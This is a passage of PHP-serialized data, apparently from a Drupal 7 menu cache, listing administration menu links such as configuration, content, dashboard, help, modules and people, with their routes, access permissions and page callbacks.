authoring\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:53:\"Settings related to formatting and authoring content.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:39;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"39\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:24:\"admin/config/development\";s:11:\"router_path\";s:24:\"admin/config/development\";s:10:\"link_title\";s:11:\"Development\";s:7:\"options\";s:68:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:18:\"Development tools.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"39\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:24:\"admin/config/development\";s:5:\"title\";s:11:\"Development\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:18:\"Development tools.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:46;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"46\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:18:\"admin/config/media\";s:11:\"router_path\";s:18:\"admin/config/media\";s:10:\"link_title\";s:5:\"Media\";s:7:\"options\";s:62:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:12:\"Media tools.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"46\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:18:\"admin/config/media\";s:5:\"title\";s:5:\"Media\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:12:\"Media tools.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:48;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"48\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:19:\"admin/config/people\";s:11:\"router_path\";s:19:\"admin/config/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:74:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:24:\"Configure user accounts.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"48\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/config/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:24:\"Configure user accounts.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:51;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"51\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:21:\"admin/config/regional\";s:11:\"router_path\";s:21:\"admin/config/regional\";s:10:\"link_title\";s:21:\"Regional and language\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Regional settings, localization and translation.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-5\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"51\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/config/regional\";s:5:\"title\";s:21:\"Regional and language\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Regional settings, localization and translation.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:53;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"53\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:19:\"admin/config/search\";s:11:\"router_path\";s:19:\"admin/config/search\";s:10:\"link_title\";s:19:\"Search and metadata\";s:7:\"options\";s:86:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:36:\"Local site search, metadata and SEO.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"53\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/config/search\";s:5:\"title\";s:19:\"Search and metadata\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:36:\"Local site search, metadata and SEO.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:56;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"56\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:19:\"admin/config/system\";s:11:\"router_path\";s:19:\"admin/config/system\";s:10:\"link_title\";s:6:\"System\";s:7:\"options\";s:87:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:37:\"General system related configuration.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"56\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/config/system\";s:5:\"title\";s:6:\"System\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:37:\"General system related configuration.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:61;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"61\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:27:\"admin/config/user-interface\";s:11:\"router_path\";s:27:\"admin/config/user-interface\";s:10:\"link_title\";s:14:\"User interface\";s:7:\"options\";s:88:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:38:\"Tools that enhance the user interface.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"61\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:27:\"admin/config/user-interface\";s:5:\"title\";s:14:\"User interface\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:38:\"Tools that enhance the user interface.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:64;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"64\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:21:\"admin/config/services\";s:11:\"router_path\";s:21:\"admin/config/services\";s:10:\"link_title\";s:12:\"Web services\";s:7:\"options\";s:80:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:30:\"Tools related to web services.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"64\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/config/services\";s:5:\"title\";s:12:\"Web services\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:30:\"Tools related to web services.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:65;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"65\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:21:\"admin/config/workflow\";s:11:\"router_path\";s:21:\"admin/config/workflow\";s:10:\"link_title\";s:8:\"Workflow\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"Content workflow, editorial workflow tools.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"65\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/config/workflow\";s:5:\"title\";s:8:\"Workflow\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"Content workflow, editorial workflow tools.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and 